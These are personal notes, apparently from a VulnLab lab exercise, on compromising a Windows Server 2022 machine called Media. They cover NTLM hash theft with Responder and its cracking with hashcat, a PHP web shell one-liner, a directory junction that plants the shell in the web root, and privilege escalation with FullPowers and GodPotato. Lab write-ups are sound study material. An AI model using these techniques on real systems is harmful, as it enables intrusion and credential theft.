Media

This is not a writeup, just my notes about VulnLabs machines.

Machine information

Operating System: Microsoft Windows Server 2022 Standard

Chain: False (standalone compromise)

Credentials

Username	Password	Method	Scope
ENOX	1234virus@	NTLM Steal

✅ Valid Usernames

ENOX

🔑 Passwords list

1234virus@

Information Gathering

# Nmap 7.94SVN scan initiated Tue Apr  8 22:04:48 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_media_tcp_allports -vvv 10.10.117.146
22/tcp   open  tcpwrapped syn-ack ttl 127
80/tcp   open  tcpwrapped syn-ack ttl 127
3389/tcp open  tcpwrapped syn-ack ttl 127

Service Enumeration

HTTP

• CMS: Umbraco

• Programming Language: PHP

Possible Usernames:

• Parveen Anand

• Diana Petersen

• Larry Parker

Foothold

The application included a feature that permitted file uploads, which would then be reviewed by an individual, resulting in the theft of NTLM hashes.

❯ sudo responder -I tun0
[sudo] password for Intrusionz3r0: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.117.146
[SMB] NTLMv2-SSP Username : MEDIA\enox
[SMB] NTLMv2-SSP Hash     : enox::MEDIA:dcdd1c94677eaf7d:38211FCE42CC272CF1741A865C0F8485:010100000000000080171981D4A8DB018C0BB451BE88EBB000000000020008004E0057003300560001001E00570049004E002D0038003800430041004B004B0051005700300050004F0004003400570049004E002D0038003800430041004B004B0051005700300050004F002E004E005700330056002E004C004F00430041004C00030014004E005700330056002E004C004F00430041004C00050014004E005700330056002E004C004F00430041004C000700080080171981D4A8DB0106000400020000000800300030000000000000000000000000300000EB457A611A6C30EF0DD25DA5B42105AB1C044EE2E5D85E08B3D65F70A8D0D93E0A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0035002E00340038000000000000000000

❯ hashcat -m 5600 enox.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

<SNIF>

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

ENOX::MEDIA:dcdd1c94677eaf7d:38211fce4<SNIF>000000:1234virus@

Lateral movement as local service user

During the enumeration the tester found and PHP file that create a folder with the name firstname, lastname and email as md5hash into C:/Windows/Tasks/Uploads/ and store all the uploaded files into it.

<?php
error_reporting(0);

    // Your PHP code for handling form submission and file upload goes here.
    $uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory

    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
        $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
        $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
        $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

        // Create a folder name using the MD5 hash of Firstname + Lastname + Email
        $folderName = md5($firstname . $lastname . $email);

        // Create the full upload directory path
        $targetDir = $uploadDir . $folderName . '/';

        // Ensure the directory exists; create it if not
        if (!file_exists($targetDir)) {
            mkdir($targetDir, 0777, true);
        }

        // Sanitize the filename to remove unsafe characters
        $originalFilename = $_FILES["fileToUpload"]["name"];
        $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);


        // Build the full path to the target file
        $targetFile = $targetDir . $sanitizedFilename;

        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
            echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";

            // Update the todo.txt file
            $todoFile = $uploadDir . 'todo.txt';
            $todoContent = "Filename: " . $originalFilename . ", Random Variable: " . $folderName . "\n";

            // Append the new line to the file
            file_put_contents($todoFile, $todoContent, FILE_APPEND);
        } else {
            echo "<script>alert('Uh oh, something went wrong... Please submit again');</script>";
        }
    }
    ?>

The filename is predictible and can be exploitable via Symlinks on Windows to rediret all the files (PHP Web Shell) into C:\xampp\htdocs and obtain a Reverse Shell into the system.

Obtaining the directory name and creating the php web shell.

echo -n  "testtesttest@test.com" | md5sum
echo '<?php system($_GET["cmd"]);?>' > shell.php

Creating the Symlinks to point to the web root directory

enox@MEDIA C:\Users>mklink /J "C:/Windows/Tasks/Uploads/44b85c98e94039c8a0a015f6d3a3449e/" "C:\xampp\htdocs" 
Junction created for C:/Windows/Tasks/Uploads/44b85c98e94039c8a0a015f6d3a3449e/ <<===>> C:\xampp\htdocs

Uploading the malicious php web shell

Accessing the php web shell as local service

Privilege Escalation to NT Authority System

Using FullPowers.exe to enable all the default token for service account.

PS C:\Users> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State   
============================= =================================== ========
SeTcbPrivilege                Act as part of the operating system Disabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled 
SeCreateGlobalPrivilege       Create global objects               Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set      Disabled
SeTimeZonePrivilege           Change the time zone                Disabled
PS C:\Users> 

Tool: FullPowers.exe

Abusing SeImpersonatePrivilege to compromise computer.

Binary: GodPotato-NET4.exe